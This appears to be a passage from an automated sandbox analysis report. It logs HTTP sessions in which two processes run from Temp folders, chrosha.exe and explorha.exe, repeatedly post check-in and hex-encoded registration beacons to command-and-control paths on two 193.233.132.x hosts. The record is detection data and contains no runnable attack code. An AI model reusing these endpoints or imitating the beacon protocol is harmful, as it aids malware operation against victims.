                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      413192.168.2.550257193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:52.775890112 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.024195910 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      414192.168.2.550258193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.011682987 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.260895967 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      415192.168.2.550259193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.276309013 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.529124975 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      416192.168.2.550260193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.510317087 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.758888960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      417192.168.2.550261193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:53.882548094 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.127079964 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      418192.168.2.550262193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.114581108 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.358174086 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      419192.168.2.550263193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.379982948 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.634313107 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      420192.168.2.550264193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.612652063 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.865683079 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      421192.168.2.550265193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:54.996042013 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.247633934 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      422192.168.2.550266193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.218303919 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.457772017 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      423192.168.2.550267193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.497378111 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.748337030 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      424192.168.2.550268193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.706698895 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:55.953375101 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      425192.168.2.550269193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.102848053 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.348803043 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      426192.168.2.550270193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.303739071 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.547142982 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      427192.168.2.550271193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.593373060 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.840373039 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      428192.168.2.550272193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:56.813230991 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.065231085 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      429192.168.2.550273193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.195770979 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:57.440165997 CEST197INHTTP/1.1 200 OK
